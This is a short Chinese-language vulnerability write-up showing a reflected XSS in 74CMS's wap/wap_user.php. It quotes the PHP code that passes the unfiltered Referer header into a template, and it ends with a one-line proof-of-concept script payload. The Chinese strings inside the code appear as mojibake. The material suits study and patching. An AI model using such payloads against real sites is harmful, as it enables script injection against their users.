74CMS wap_user.php XSS 漏洞

文件 /74cms/wap/wap_user.php:

45 elseif ($act == 'add_favorites')
46 {
47         require_once(QISHI_ROOT_PATH.'include/fun_personal.php');
48         $id=isset($_GET['id'])?trim($_GET['id']):exit("³ö´íÁË");
49                 $link[0]['text'] = "[·µ»ØÉÏÒ»Ò³]";
50                 $link[0]['href'] = $_SERVER["HTTP_REFERER"];
51                 $link[1]['text'] = "[²é¿´ÊղؼÐ]";
52                 $link[1]['href'] = 'wap_user.php?act=favorites';
53         if(add_favorites($id,$_SESSION['uid'])==0)
54         {
55         WapShowMsg("Ìí¼Óʧ°Ü£¬ÊղؼÐÖÐÒѾ­´æÔÚ´Ëְλ",0,$link);
56         }
57         else
58         {
59         WapShowMsg("Ìí¼Ó³É¹¦",2,$link);
60         }
61 }

乱码就不解释了。第 50 行 Referer 没过滤,55 行调用了 WapShowMsg。WapShowMsg 函数的实现:

function WapShowMsg($msg_detail, $msg_type = 0, $links = array())
{
    global $smarty;
    if (count($links) == 0)
    {
	$links[0]['text'] = '·µ»ØÉÏÒ»Ò³';
	$links[0]['href'] = 'javascript:history.go(-1)';
    }
    $smarty->assign('ur_here',     'ϵͳÌáʾ');
    $smarty->assign('msg_type',    $msg_type);
    $smarty->assign('msg_detail',  $msg_detail);
    $smarty->assign('links',       $links);
    $smarty->assign('default_url', $links[0]['href']);
    $smarty->display('wap/wap-showmsg.htm');
    exit();
}

没过滤就给模板渲染了,Referer 里可直接插入 JS 来触发漏洞:

"><script>alert(1)</script>